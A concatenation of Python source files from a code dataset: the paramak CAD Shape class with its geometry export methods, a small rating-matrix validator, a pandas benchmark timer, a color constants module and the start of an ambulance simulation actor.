self._color\n\n @color.setter\n def color(self, value):\n error = False\n if isinstance(value, (list, tuple)):\n if len(value) in [3, 4]:\n for i in value:\n if not isinstance(i, (int, float)):\n error = True\n else:\n error = True\n else:\n error = True\n # raise error\n if error:\n raise ValueError(\n \"Shape.color must be a list or tuple of 3 or 4 floats\")\n self._color = value\n\n @property\n def material_tag(self):\n \"\"\"The material_tag assigned to the Shape. Used when taging materials\n for use in neutronics descriptions\"\"\"\n\n return self._material_tag\n\n @material_tag.setter\n def material_tag(self, value):\n if value is None:\n self._material_tag = value\n elif isinstance(value, str):\n if len(value) > 27:\n msg = \"Shape.material_tag > 28 characters.\" + \\\n \"Use with DAGMC will be affected.\" + str(value)\n warnings.warn(msg)\n self._material_tag = value\n else:\n raise ValueError(\"Shape.material_tag must be a string\", value)\n\n @property\n def tet_mesh(self):\n return self._tet_mesh\n\n @tet_mesh.setter\n def tet_mesh(self, value):\n if value is not None and not isinstance(value, str):\n raise ValueError(\"Shape.tet_mesh must be a string\", value)\n self._tet_mesh = value\n\n @property\n def name(self):\n \"\"\"The name of the Shape, used to identify Shapes when exporting_html\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, value):\n if value is not None and not isinstance(value, str):\n raise ValueError(\"Shape.name must be a string\", value)\n self._name = value\n\n @property\n def points(self):\n \"\"\"Sets the Shape.point attributes.\n\n Args:\n points (a list of lists or tuples): list of points that create the\n shape\n\n Raises:\n incorrect type: only list of lists or tuples are accepted\n \"\"\"\n ignored_keys = [\"_points\", \"_points_hash_value\"]\n if hasattr(self, 'find_points') and \\\n self.points_hash_value != get_hash(self, ignored_keys):\n self.find_points()\n self.points_hash_value = get_hash(self, ignored_keys)\n\n return self._points\n\n @points.setter\n def points(self, values):\n\n if values is not None:\n if not isinstance(values, list):\n raise ValueError(\"points must be a list\")\n\n if self.connection_type != \"mixed\":\n values = [(*p, self.connection_type) for p in values]\n\n for value in values:\n if type(value) not in [list, tuple]:\n msg = \"individual points must be a list or a tuple.\" + \\\n \"{} in of type {}\".format(value, type(value))\n raise ValueError(msg)\n\n for value in values:\n # Checks that the length of each tuple in points is 2 or 3\n if len(value) not in [2, 3]:\n msg = \"individual points contain 2 or 3 entries {} has a \\\n length of {}\".format(value, len(values[0]))\n raise ValueError(msg)\n\n # Checks that the XY points are numbers\n if not isinstance(value[0], numbers.Number):\n msg = \"The first value in the tuples that make \\\n up the points represents the X value \\\n and must be a number {}\".format(value)\n raise ValueError(msg)\n if not isinstance(value[1], numbers.Number):\n msg = \"The second value in the tuples that make \\\n up the points represents the X value \\\n and must be a number {}\".format(value)\n raise ValueError(msg)\n\n # Checks that only straight and spline are in the connections\n # part of points\n if len(value) == 3:\n if value[2] not in [\"straight\", \"spline\", \"circle\"]:\n msg = 'individual connections must be either \\\n \"straight\", \"circle\" or \"spline\"'\n raise ValueError(msg)\n\n # checks that the entries in the points are either all 2 long or\n # all 3 long, not a mixture\n if not all(len(entry) == 2 for entry in values):\n if not all(len(entry) == 3 for entry in values):\n msg = \"The points list should contain entries of length 2 \\\n or 3 but not a mixture of 2 and 3\"\n raise ValueError(msg)\n\n if len(values) > 1:\n if values[0][:2] == values[-1][:2]:\n msg = \"The coordinates of the last and first points are \\\n the same.\"\n raise ValueError(msg)\n\n values.append(values[0])\n\n self._points = values\n\n @property\n def stp_filename(self):\n \"\"\"Sets the Shape.stp_filename attribute which is used as the filename\n when exporting the geometry to stp format. Note, .stp will be added to\n filenames not ending with .step or .stp.\n\n Args:\n value (str): the value to use as the stp_filename\n\n Raises:\n incorrect type: only str values are accepted\n \"\"\"\n\n return self._stp_filename\n\n @stp_filename.setter\n def stp_filename(self, value):\n if value is not None:\n if isinstance(value, str):\n if Path(value).suffix not in [\".stp\", \".step\"]:\n msg = \"Incorrect filename ending, filename must end with \\\n .stp or .step\"\n raise ValueError(msg)\n else:\n msg = \"stp_filename must be a \\\n string {} {}\".format(value, type(value))\n raise ValueError(msg)\n self._stp_filename = value\n\n @property\n def stl_filename(self):\n \"\"\"Sets the Shape.stl_filename attribute which is used as the filename\n when exporting the geometry to stl format. Note .stl will be added to\n filenames not ending with .stl\n\n Args:\n value (str): the value to use as the stl_filename\n\n Raises:\n incorrect type: only str values are accepted\n \"\"\"\n return self._stl_filename\n\n @stl_filename.setter\n def stl_filename(self, value):\n if value is not None:\n if isinstance(value, str):\n if Path(value).suffix != \".stl\":\n msg = \"Incorrect filename ending, filename must end with \\\n .stl\"\n raise ValueError(msg)\n else:\n msg = \"stl_filename must be a string \\\n {} {}\".format(value, type(value))\n raise ValueError(msg)\n self._stl_filename = value\n\n @property\n def azimuth_placement_angle(self):\n return self._azimuth_placement_angle\n\n @azimuth_placement_angle.setter\n def azimuth_placement_angle(self, value):\n error = False\n if isinstance(value, (int, float, Iterable)) and \\\n not isinstance(value, str):\n if isinstance(value, Iterable):\n for i in value:\n if not isinstance(i, (int, float)):\n error = True\n else:\n error = True\n\n if error:\n msg = \"azimuth_placement_angle must be a float or list of floats\"\n raise ValueError(msg)\n self._azimuth_placement_angle = value\n\n def create_solid(self) -> cq.Workplane:\n solid = None\n if self.points is not None:\n # obtains the first two values of the points list\n XZ_points = [(p[0], p[1]) for p in self.points]\n\n for point in self.points:\n if len(point) != 3:\n msg = \"The points list should contain two coordinates and \\\n a connetion type\"\n raise ValueError(msg)\n\n # obtains the last values of the points list\n connections = [p[2] for p in self.points[:-1]]\n\n current_linetype = connections[0]\n current_points_list = []\n instructions = []\n # groups together common connection types\n for i, connection in enumerate(connections):\n if connection == current_linetype:\n current_points_list.append(XZ_points[i])\n else:\n current_points_list.append(XZ_points[i])\n instructions.append(\n {current_linetype: current_points_list})\n current_linetype = connection\n current_points_list = [XZ_points[i]]\n instructions.append({current_linetype: current_points_list})\n\n if list(instructions[-1].values())[0][-1] != XZ_points[0]:\n keyname = list(instructions[-1].keys())[0]\n instructions[-1][keyname].append(XZ_points[0])\n\n if hasattr(self, \"path_points\"):\n\n factor = 1\n if self.workplane in [\"XZ\", \"YX\", \"ZY\"]:\n factor *= -1\n\n solid = cq.Workplane(self.workplane).center(0, 0)\n\n if self.force_cross_section:\n for point in self.path_points[:-1]:\n solid = solid.workplane(offset=point[1] * factor).\\\n center(point[0], 0).workplane()\n for entry in instructions:\n if list(entry.keys())[0] == \"spline\":\n solid = solid.spline(\n listOfXYTuple=list(entry.values())[0])\n if list(entry.keys())[0] == \"straight\":\n solid = solid.polyline(list(entry.values())[0])\n if list(entry.keys())[0] == \"circle\":\n p0, p1, p2 = list(entry.values())[0][:3]\n solid = solid.moveTo(p0[0], p0[1]).\\\n threePointArc(p1, p2)\n solid = solid.close()\n solid = solid.center(-point[0], 0).\\\n workplane(offset=-point[1] * factor)\n\n elif self.force_cross_section == False:\n solid = solid.workplane(\n offset=self.path_points[0][1] *\n factor).center(\n self.path_points[0][0],\n 0).workplane()\n for entry in instructions:\n if list(entry.keys())[0] == \"spline\":\n solid = solid.spline(\n listOfXYTuple=list(entry.values())[0])\n if list(entry.keys())[0] == \"straight\":\n solid = solid.polyline(list(entry.values())[0])\n if list(entry.keys())[0] == \"circle\":\n p0 = list(entry.values())[0][0]\n p1 = list(entry.values())[0][1]\n p2 = list(entry.values())[0][2]\n solid = solid.moveTo(\n p0[0], p0[1]).threePointArc(\n p1, p2)\n\n solid = solid.close().center(0, 0).\\\n center(-self.path_points[0][0], 0).\\\n workplane(offset=-self.path_points[0][1] * factor)\n\n solid = solid.workplane(offset=self.path_points[-1][1] * factor).\\\n center(self.path_points[-1][0], 0).workplane()\n\n else:\n # for rotate and extrude shapes\n solid = cq.Workplane(self.workplane)\n # for extrude shapes\n if hasattr(self, \"extrusion_start_offset\"):\n extrusion_offset = -self.extrusion_start_offset\n solid = solid.workplane(offset=extrusion_offset)\n\n for entry in instructions:\n if list(entry.keys())[0] == \"spline\":\n solid = solid.spline(listOfXYTuple=list(entry.values())[0])\n if list(entry.keys())[0] == \"straight\":\n solid = solid.polyline(list(entry.values())[0])\n if list(entry.keys())[0] == \"circle\":\n p0 = list(entry.values())[0][0]\n p1 = list(entry.values())[0][1]\n p2 = list(entry.values())[0][2]\n solid = solid.moveTo(p0[0], p0[1]).threePointArc(p1, p2)\n\n return solid\n\n def rotate_solid(\n self,\n solid: Optional[cq.Workplane]) -> cq.Workplane:\n # Checks if the azimuth_placement_angle is a list of angles\n if isinstance(self.azimuth_placement_angle, Iterable):\n azimuth_placement_angles = self.azimuth_placement_angle\n else:\n azimuth_placement_angles = [self.azimuth_placement_angle]\n\n rotated_solids = []\n # Perform seperate rotations for each angle\n for angle in azimuth_placement_angles:\n rotated_solids.append(\n solid.rotate(\n *self.get_rotation_axis()[0], angle))\n solid = cq.Workplane(self.workplane)\n\n # Joins the seperate solids together\n for i in rotated_solids:\n solid = solid.union(i)\n return solid\n\n def get_rotation_axis(self):\n # TODO add return type hinting -> Tuple[List[Tuple[int, int, int],\n # Tuple[int, int, int]], str]\n \"\"\"Returns the rotation axis for a given shape. If self.rotation_axis\n is None, the rotation axis will be computed from self.workplane (or\n from self.path_workplane if applicable). If self.rotation_axis is an\n acceptable string (eg. \"X\", \"+Y\", \"-Z\"...) then this axis will be used.\n If self.rotation_axis is a list of two points, then these two points\n will be used to form an axis.\n\n Returns:\n list, str: list of two XYZ points and the string of the axis (eg.\n \"X\", \"Y\"..)\n \"\"\"\n rotation_axis = {\n \"X\": [(-1, 0, 0), (1, 0, 0)],\n \"-X\": [(1, 0, 0), (-1, 0, 0)],\n \"Y\": [(0, -1, 0), (0, 1, 0)],\n \"-Y\": [(0, 1, 0), (0, -1, 0)],\n \"Z\": [(0, 0, -1), (0, 0, 1)],\n \"-Z\": [(0, 0, 1), (0, 0, -1)],\n }\n if isinstance(self.rotation_axis, str):\n # X, Y or Z axis\n return (\n rotation_axis[self.rotation_axis.replace(\"+\", \"\")],\n self.rotation_axis\n )\n elif isinstance(self.rotation_axis, Iterable):\n # Custom axis\n return self.rotation_axis, \"custom_axis\"\n elif self.rotation_axis is None:\n # Axis from workplane or path_workplane\n if hasattr(self, \"path_workplane\"):\n # compute from path_workplane instead\n workplane = self.path_workplane\n else:\n workplane = self.workplane\n return rotation_axis[workplane[1]], workplane[1]\n\n def create_limits(self) -> Tuple[float, float, float, float]:\n \"\"\"Finds the x,y,z limits (min and max) of the points that make up the\n face of the shape. Note the Shape may extend beyond this boundary if\n splines are used to connect points.\n\n Raises:\n ValueError: if no points are defined\n\n Returns:\n float, float, float, float, float, float: x_minimum, x_maximum,\n y_minimum, y_maximum, z_minimum, z_maximum\n \"\"\"\n\n if hasattr(self, \"find_points\"):\n self.find_points()\n if self.points is None:\n raise ValueError(\"No points defined for\", self)\n\n self.x_min = float(min([row[0] for row in self.points]))\n self.x_max = float(max([row[0] for row in self.points]))\n\n self.z_min = float(min([row[1] for row in self.points]))\n self.z_max = float(max([row[1] for row in self.points]))\n\n return self.x_min, self.x_max, self.z_min, self.z_max\n\n def export_stl(\n self,\n filename: str,\n tolerance: Optional[float] = 0.001,\n angular_tolerance: Optional[float] = 0.1) -> str:\n \"\"\"Exports an stl file for the Shape.solid. If the provided filename\n doesn't end with .stl it will be added\n\n Args:\n filename: the filename of the stl file to be exported\n tolerance: the deflection tolerance of the faceting\n angular_tolerance: the angular tolerance, in radians\n \"\"\"\n\n path_filename = Path(filename)\n\n if path_filename.suffix != \".stl\":\n path_filename = path_filename.with_suffix(\".stl\")\n\n path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n\n exporters.export(self.solid, str(path_filename), exportType='STL',\n tolerance=tolerance,\n angularTolerance=angular_tolerance)\n\n print(\"Saved file as \", path_filename)\n\n return str(path_filename)\n\n def export_stp(\n self,\n filename: Optional[str] = None,\n units: Optional[str] = 'mm',\n mode: Optional[str] = 'solid') -> str:\n \"\"\"Exports an stp file for the Shape.solid. If the filename provided\n doesn't end with .stp or .step then .stp will be added. If a\n filename is not provided and the shape's stp_filename property is\n not None the stp_filename will be used as the export filename.\n\n Args:\n filename (str): the filename of the stp\n units (str): the units of the stp file, options are 'cm' or 'mm'.\n Default is mm.\n mode (str, optional): the object to export can be either\n 'solid' which exports 3D solid shapes or the 'wire' which\n exports the wire edges of the shape. Defaults to 'solid'.\n \"\"\"\n\n if filename is not None:\n path_filename = Path(filename)\n\n if path_filename.suffix == \".stp\" or path_filename.suffix == \".step\":\n pass\n else:\n path_filename = path_filename.with_suffix(\".stp\")\n\n path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n elif self.stp_filename is not None:\n path_filename = Path(self.stp_filename)\n\n if mode == 'solid':\n exporters.export(self.solid, str(path_filename), exportType='STEP')\n elif mode == 'wire':\n exporters.export(self.wire, str(path_filename), exportType='STEP')\n else:\n raise ValueError(\"The mode argument for export_stp \\\n only accepts 'solid' or 'wire'\", self)\n\n if units == 'cm':\n _replace(\n path_filename,\n 'SI_UNIT(.MILLI.,.METRE.)',\n 'SI_UNIT(.CENTI.,.METRE.)')\n\n print(\"Saved file as \", path_filename)\n\n return str(path_filename)\n\n def export_physical_groups(self, filename: str) -> str:\n \"\"\"Exports a JSON file containing a look up table which is useful for\n identifying faces and volumes. If filename provided doesn't end with\n .json then .json will be added.\n\n Args:\n filename (str): the filename used to save the json file\n \"\"\"\n\n path_filename = Path(filename)\n\n if path_filename.suffix != \".json\":\n path_filename = path_filename.with_suffix(\".json\")\n\n path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n if self.physical_groups is not None:\n with open(filename, \"w\") as outfile:\n json.dump(self.physical_groups, outfile, indent=4)\n\n print(\"Saved physical_groups description to \", path_filename)\n else:\n print(\n \"Warning: physical_groups attribute is None \\\n for {}\".format(\n self.name\n )\n )\n\n return str(path_filename)\n\n def export_svg(\n self,\n filename: Optional[str] = 'shape.svg',\n projectionDir: Tuple[float, float, float] = (-1.75, 1.1, 5),\n width: Optional[float] = 800,\n height: Optional[float] = 800,\n marginLeft: Optional[float] = 100,\n marginTop: Optional[float] = 100,\n strokeWidth: Optional[float] = None,\n strokeColor: Optional[Tuple[int, int, int]] = (0, 0, 0),\n hiddenColor: Optional[Tuple[int, int, int]] = (100, 100, 100),\n showHidden: Optional[bool] = True,\n showAxes: Optional[bool] = False) -> str:\n \"\"\"Exports an svg file for the Reactor.solid. If the filename provided\n doesn't end with .svg it will be added.\n\n Args:\n filename: the filename of the svg file to be exported. Defaults to\n \"reactor.svg\".\n projectionDir: The direction vector to view the geometry from\n (x, y, z). Defaults to (-1.75, 1.1, 5)\n width: the width of the svg image produced in pixels. Defaults to\n 1000\n height: the height of the svg image produced in pixels. Defaults to\n 800\n marginLeft: the number of pixels between the left edge of the image\n and the start of the geometry.\n marginTop: the number of pixels between the top edge of the image\n and the start of the geometry.\n strokeWidth: the width of the lines used to draw the geometry.\n Defaults to None which automatically selects an suitable width.\n strokeColor: the color of the lines used to draw the geometry in\n RGB format with each value between 0 and 255. Defaults to\n (0, 0, 0) which is black.\n hiddenColor: the color of the lines used to draw the geometry in\n RGB format with each value between 0 and 255. Defaults to\n (100, 100, 100) which is light grey.\n showHidden: If the edges obscured by geometry should be included in\n the diagram. Defaults to True.\n showAxes: If the x, y, z axis should be included in the image.\n Defaults to False.\n\n Returns:\n str: the svg filename created\n \"\"\"\n\n path_filename = Path(filename)\n\n if path_filename.suffix != \".svg\":\n path_filename = path_filename.with_suffix(\".svg\")\n\n path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n\n opt = {\n \"width\": width,\n \"height\": height,\n \"marginLeft\": marginLeft,\n \"marginTop\": marginTop,\n \"showAxes\": showAxes,\n \"projectionDir\": projectionDir,\n \"strokeColor\": strokeColor,\n \"hiddenColor\": hiddenColor,\n \"showHidden\": showHidden\n }\n\n if strokeWidth is not None:\n opt[\"strokeWidth\"] = strokeWidth\n\n exporters.export(self.solid, str(path_filename), exportType='SVG',\n opt=opt)\n\n print(\"Saved file as \", path_filename)\n\n return str(path_filename)\n\n def export_html(\n self,\n filename: Optional[str] = \"shape.html\",\n facet_splines: Optional[bool] = True,\n facet_circles: Optional[bool] = True,\n tolerance: Optional[float] = 1e-3,\n view_plane: Optional[str] = None,\n ):\n \"\"\"Creates a html graph representation of the points and connections\n for the Shape object. Shapes are colored by their .color property.\n Shapes are also labelled by their .name. If filename provided doesn't\n end with .html then .html will be added.\n\n Args:\n filename: the filename used to save the html graph. Defaults to\n shape.html\n facet_splines: If True then spline edges will be faceted. Defaults\n to True.\n facet_circles: If True then circle edges will be faceted. Defaults\n to True.\n tolerance: faceting toleranceto use when faceting cirles and\n splines. Defaults to 1e-3.\n view_plane: The plane to project Defaults to the workplane of the\n paramak.Shape\n\n Returns:\n plotly.Figure(): figure object\n \"\"\"\n\n # if view plane is not set then use the shape workplane\n if view_plane is None:\n view_plane = self.workplane\n\n if self.points is None:\n if hasattr(self, 'path_points') and self.path_points is None:\n raise ValueError(\"No points or point_path defined for\", self)\n\n if self.wire is None:\n raise ValueError(\"No wire defined for\", self)\n\n if not isinstance(self.wire, list):\n list_of_wires = [self.wire]\n else:\n list_of_wires = self.wire\n\n fig = paramak.utils.export_wire_to_html(\n wires=list_of_wires,\n filename=filename,\n view_plane=view_plane,\n facet_splines=facet_splines,\n facet_circles=facet_circles,\n tolerance=tolerance,\n title=\"coordinates of \" + self.__class__.__name__ +\n \" shape, viewed from the \" + view_plane + \" plane\",\n )\n\n if self.points is not None:\n fig.add_trace(\n plotly_trace(\n points=self.points,\n mode=\"markers\",\n name='Shape.points'\n )\n )\n\n # sweep shapes have .path_points but not .points attribute\n if hasattr(self, 'path_points'):\n fig.add_trace(\n plotly_trace(\n points=self.path_points,\n mode=\"markers\",\n name='Shape.path_points'\n )\n )\n\n return fig\n\n def export_2d_image(\n self,\n filename: Optional[str] = 'shape.png',\n xmin: Optional[float] = 0.,\n xmax: Optional[float] = 900.,\n ymin: Optional[float] = -600.,\n ymax: Optional[float] = 600.):\n \"\"\"Exports a 2d image (png) of the reactor. Components are colored by\n their Shape.color property. If filename provided doesn't end with .png\n then .png will be added.\n\n Args:\n filename (str): the filename of the saved png image.\n xmin (float, optional): the minimum x value of the x axis.\n Defaults to 0..\n xmax (float, optional): the maximum x value of the x axis.\n Defaults to 900..\n ymin (float, optional): the minimum y value of the y axis.\n Defaults to -600..\n ymax (float, optional): the maximum y value of the y axis.\n Defaults to 600..\n\n Returns:\n matplotlib.plt(): a plt object\n \"\"\"\n\n fig, ax = plt.subplots()\n\n patch = self._create_patch()\n\n ax.add_collection(patch)\n\n ax.axis(\"equal\")\n ax.set(xlim=(xmin, xmax), ylim=(ymin, ymax))\n ax.set_aspect(\"equal\", \"box\")\n\n plt.savefig(filename, dpi=100)\n plt.close()\n print(\"\\n saved 2d image to \", filename)\n\n return plt\n\n def _create_patch(self):\n \"\"\"Creates a matplotlib polygon patch from the Shape points. This is\n used when making 2d images of the Shape object.\n\n Raises:\n ValueError: No points defined for the Shape\n\n Returns:\n Matplotlib object patch: a plotable polygon shape\n \"\"\"\n\n if self.points is None:\n raise ValueError(\"No points defined for\", self)\n\n patches = []\n\n edges = facet_wire(\n wire=self.wire,\n facet_splines=True,\n facet_circles=True)\n\n fpoints = []\n for edge in edges:\n for vertice in edge.Vertices():\n fpoints.append((vertice.X, vertice.Z))\n\n polygon = Polygon(fpoints, closed=True)\n patches.append(polygon)\n\n patch = PatchCollection(patches)\n\n if self.color is not None:\n patch.set_facecolor(self.color)\n patch.set_color(self.color)\n patch.color = self.color\n patch.edgecolor = self.color\n # checks to see if an alpha value is provided in the color\n if len(self.color) == 4:\n patch.set_alpha = self.color[-1]\n self.patch = patch\n return patch\n\n def neutronics_description(self) -> dict:\n \"\"\"Returns a neutronics description of the Shape object. This is needed\n for the use with automated neutronics model methods which require\n linkage between the stp files and materials. If tet meshing of the\n volume is required then Trelis meshing commands can be optionally\n specified as the tet_mesh argument.\n\n Returns:\n dictionary: a dictionary of the step filename and material name\n \"\"\"\n\n neutronics_description = {\"material\": self.material_tag}\n\n if self.stp_filename is not None:\n neutronics_description[\"stp_filename\"] = self.stp_filename\n # this is needed as ppp looks for the filename key\n neutronics_description[\"filename\"] = self.stp_filename\n\n if self.tet_mesh is not None:\n neutronics_description[\"tet_mesh\"] = self.tet_mesh\n\n if self.surface_reflectivity is True:\n neutronics_description[\"surface_reflectivity\"] = self.surface_reflectivity\n\n if self.stl_filename is not None:\n neutronics_description[\"stl_filename\"] = self.stl_filename\n\n return neutronics_description\n\n def perform_boolean_operations(self, solid: cq.Workplane, **kwargs):\n \"\"\"Performs boolean cut, intersect and union operations if shapes are\n provided\"\"\"\n\n # If a cut solid is provided then perform a boolean cut\n if self.cut is not None:\n solid = cut_solid(solid, self.cut)\n\n # If a wedge cut is provided then perform a boolean cut\n # Performed independantly to avoid use of self.cut\n # Prevents repetition of 'outdated' wedge cuts\n if 'wedge_cut' in kwargs:\n if kwargs['wedge_cut'] is not None:\n solid = cut_solid(solid, kwargs['wedge_cut'])\n\n # If an intersect is provided then perform a boolean intersect\n if self.intersect is not None:\n solid = intersect_solid(solid, self.intersect)\n\n # If an intersect is provided then perform a boolean intersect\n if self.union is not None:\n solid = union_solid(solid, self.union)\n\n return solid\n\n def make_graveyard(\n self,\n graveyard_offset: Optional[int] = 100) -> cq.Workplane:\n \"\"\"Creates a graveyard volume (bounding box) that encapsulates all\n volumes. This is required by DAGMC when performing neutronics\n simulations.\n\n Args:\n graveyard_offset (float): the offset between the largest edge of\n the geometry and inner bounding shell created. Defaults to\n 100\n\n Returns:\n CadQuery solid: a shell volume that bounds the geometry, referred\n to as a graveyard in DAGMC\n \"\"\"\n\n self.graveyard_offset = graveyard_offset\n\n if self.solid is None:\n self.create_solid()\n\n graveyard_shape = paramak.HollowCube(\n length=self.largest_dimension * 2 + graveyard_offset * 2,\n name=\"Graveyard\",\n material_tag=\"Graveyard\",\n stp_filename=\"Graveyard.stp\",\n stl_filename=\"Graveyard.stl\",\n )\n\n self.graveyard = graveyard_shape\n\n return graveyard_shape\n\n def export_h5m(\n self,\n filename: Optional[str] = 'dagmc.h5m',\n skip_graveyard: Optional[bool] = False,\n tolerance: Optional[float] = 0.001,\n graveyard_offset: Optional[float] = 100) -> str:\n \"\"\"Converts stl files into DAGMC compatible h5m file using PyMOAB. The\n DAGMC file produced has not been imprinted and merged unlike the other\n supported method which uses Trelis to produce an imprinted and merged\n DAGMC geometry. If the provided filename doesn't end with .h5m it will\n be added\n\n Args:\n filename (str, optional): filename of h5m outputfile\n Defaults to \"dagmc.h5m\".\n skip_graveyard (boolean, optional): filename of h5m outputfile\n Defaults to False.\n tolerance (float, optional): the precision of the faceting\n Defaults to 0.001.\n graveyard_offset (float, optional): the offset between the largest\n edge of the geometry and inner bounding shell created. Defualts\n to 100.\n Returns:\n filename: output h5m filename\n \"\"\"\n\n path_filename = Path(filename)\n\n if path_filename.suffix != \".h5m\":\n path_filename = path_filename.with_suffix(\".h5m\")\n\n path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n\n self.export_stl(self.stl_filename, tolerance=tolerance)\n\n moab_core, moab_tags = define_moab_core_and_tags()\n\n moab_core = add_stl_to_moab_core(\n moab_core=moab_core,\n surface_id=1,\n volume_id=1,\n material_name=self.material_tag,\n tags=moab_tags,\n stl_filename=self.stl_filename\n )\n\n if skip_graveyard is False:\n self.make_graveyard(graveyard_offset=graveyard_offset)\n self.graveyard.export_stl(self.graveyard.stl_filename)\n volume_id = 2\n surface_id = 2\n moab_core = add_stl_to_moab_core(\n moab_core=moab_core,\n surface_id=surface_id,\n volume_id=volume_id,\n material_name=self.graveyard.material_tag,\n tags=moab_tags,\n stl_filename=self.graveyard.stl_filename\n )\n\n all_sets = moab_core.get_entities_by_handle(0)\n\n file_set = moab_core.create_meshset()\n\n moab_core.add_entities(file_set, all_sets)\n\n moab_core.write_file(str(path_filename))\n\n return str(path_filename)\n\n def export_graveyard(\n self,\n graveyard_offset: Optional[float] = 100,\n filename: Optional[str] = \"Graveyard.stp\") -> str:\n \"\"\"Writes an stp file (CAD geometry) for the reactor graveyard. This\n is needed for DAGMC simulations. This method also calls\n Reactor.make_graveyard with the offset.\n\n Args:\n filename (str): the filename for saving the stp file\n graveyard_offset (float): the offset between the largest edge of\n the geometry and inner bounding shell created. Defaults to\n Reactor.graveyard_offset\n\n Returns:\n str: the stp filename created\n \"\"\"\n\n self.make_graveyard(graveyard_offset=graveyard_offset)\n new_filename = self.graveyard.export_stp(Path(filename))\n\n return new_filename\n","sub_path":"paramak/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":47596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"12086991","text":"import pandas as pd\nimport json\nimport scipy.sparse as sp\nimport numpy as np\n\ndef valid(train_file, test_file):\n train_mat = sp.dok_matrix((6040, 3952), dtype=np.float32)\n with open(train_file) as f:\n line = f.readline()\n while line:\n u, i, r = line.split('\\t')\n u = int(u)\n i = int(i)\n train_mat[u, i] = 1\n line = f.readline()\n with open(test_file) as f:\n line = f.readline()\n while line:\n u, i = line.split('\\t')\n if (u, i) in train_mat.keys():\n print(u, i)\n line = f.readline()\n\nif __name__ == \"__main__\":\n # valid('Data/all_train_rating.txt', 'Data/all_test_rating.txt')\n print(np.random.randint(4))","sub_path":"Code_zxy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"580719470","text":"from definitions_pandas import *\nfrom random import shuffle\nfrom timeit import timeit\nfrom sys import exit\nimport argparse\n\nparser = argparse.ArgumentParser(description = \"Time pandas benchmark\")\nparser.add_argument(\"-out\", type = str, \n metavar = 'path', nargs = '?', default = None,\n help = \"path to file to write results in csv format\"\n )\nparser.add_argument(\"-iters\", type = int,\n metavar = \"n\", nargs = '?', default = 10,\n help = \"number of iterations for each function\")\nargs = parser.parse_args()\n\n# parse command line arguments\nif args.out != None:\n # append to file\n filehandle = open(args.out, \"a\")\nelse:\n filehandle = None \niters = args.iters\n\n\ndef timeAndWrite(f, filehandle, iters):\n funcname = f.__name__\n querynumber = funcname[1:]\n # timeit returns time in seconds, we want milliseconds\n time = (1000.0 * timeit(f, number = iters)) / iters\n # we don't care about measuring memory for pandas\n msg = \"fintime,pandas,\" + str(iters) + \",\" + querynumber + \",\" + str(time) + \",NA\\n\"\n if filehandle == None:\n print(msg)\n else:\n filehandle.write(msg)\n\n\nfunctions = [ q0, q1, q2, q3, q4, q5, q6, q7, q8, q9 ]\nshuffle(functions) # randomize their execution order\n\n# run and time each function, write to path if provided\nfor functionName in functions:\n timeAndWrite(functionName, filehandle, iters)\n\n# clean up\nif filehandle != None:\n filehandle.close()\n\nexit()\n \n\n \n\n\n","sub_path":"src/benchmark/fintime/src/experiments/run_pandas.py","file_name":"run_pandas.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"124444648","text":"\"\"\"\ncolor\n\npart of hwpy: an OO hardware interface library\n\nhome: https://www.github.com/wovo/hwpy\n\"\"\"\n\nclass color:\n def __init__( self, red : int, green : int, blue : int ):\n self.red = red\n self.green = green\n self.blue = blue\n\nblack = color( 0, 0, 0 )\nwhite = color( 0xFF, 0xFF, 0xFF )\nred = color( 0xFF, 0, 0 ) \ngreen = color( 0, 0xFF, 0 )\nblue = color( 0, 0, 0xFF )\ngray = color( 0x80, 0x80, 0x80 )\nyellow = color( 0xFF, 0xFF, 0 )\ncyan = color( 0, 0xFF, 0xFF )\nmagenta = color( 0xFF, 0, 0xFF )\n \nviolet = color( 0xEE, 0x82, 0xEE ) \nsienna = color( 0xA0, 0x52, 0x2D ) \npurple = color( 0x80, 0x00, 0x80 ) \npink = color( 0xFF, 0xC8, 0xCB ) \nsilver = color( 0xC0, 0xC0, 0xC0 ) \nbrown = color( 0xA5, 0x2A, 0x2A ) \nsalmon = color( 0xFA, 0x80, 0x72 )\n\n\n","sub_path":"hwpy_modules/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"64593695","text":"import logging\nfrom typing import Callable\n\nfrom smart_intervention.geolocation.location import Location\nfrom smart_intervention.globals import notifications, CityMap\nfrom smart_intervention.geolocation.geolocated_actor import GeolocatedActor\nfrom smart_intervention.geolocation.map import RoutingError\nfrom smart_intervention.models.actors.ambulance.ambulance_notification import AmbulanceNotification\nfrom smart_intervention.models.actors.ambulance.ambulance_purpose import AmbulancePurpose\nfrom smart_intervention.models.actors.ambulance_headquarter.ambulance_headquarter_notification import \\\n AmbulanceHeadquarterNotification\nfrom smart_intervention.models.actors.bases.purposeful_actor import PurposefulActor\nfrom smart_intervention.utils.processing import mass_process\n\n\nclass AmbulanceError(Exception):\n pass\n\n\nclass Ambulance(PurposefulActor, GeolocatedActor):\n def __init__(self, purpose: AmbulancePurpose, location: Location, efficiency, ambulance_hq: Location):\n super().__init__(purpose)\n super(PurposefulActor, self).__init__(location)\n self.efficiency = efficiency\n self.intervention_event = None\n self.ambulance_hq = ambulance_hq\n self.current_route = None\n self.log = logging.getLogger(f'Ambulance#{id(self)}')\n\n def tick_action(self, notifications) -> Callable:\n def action():\n processable_notifications = notifications.get_notifications_for_processing(self)\n processable_notifications = processable_notifications.get()\n processable_notifications = [\n notification for notification in processable_notifications\n if notification.payload['ambulance'] == self\n ] # Filter out notifications for other instances of ambulances\n processable_len = len(processable_notifications)\n notifications.declare_received(processable_len)\n self.log.debug(f'Received {processable_len} processable notifications')\n self._process_notifications(processable_notifications)\n self._take_action()\n\n return action\n\n def re_purpose(self, purpose):\n 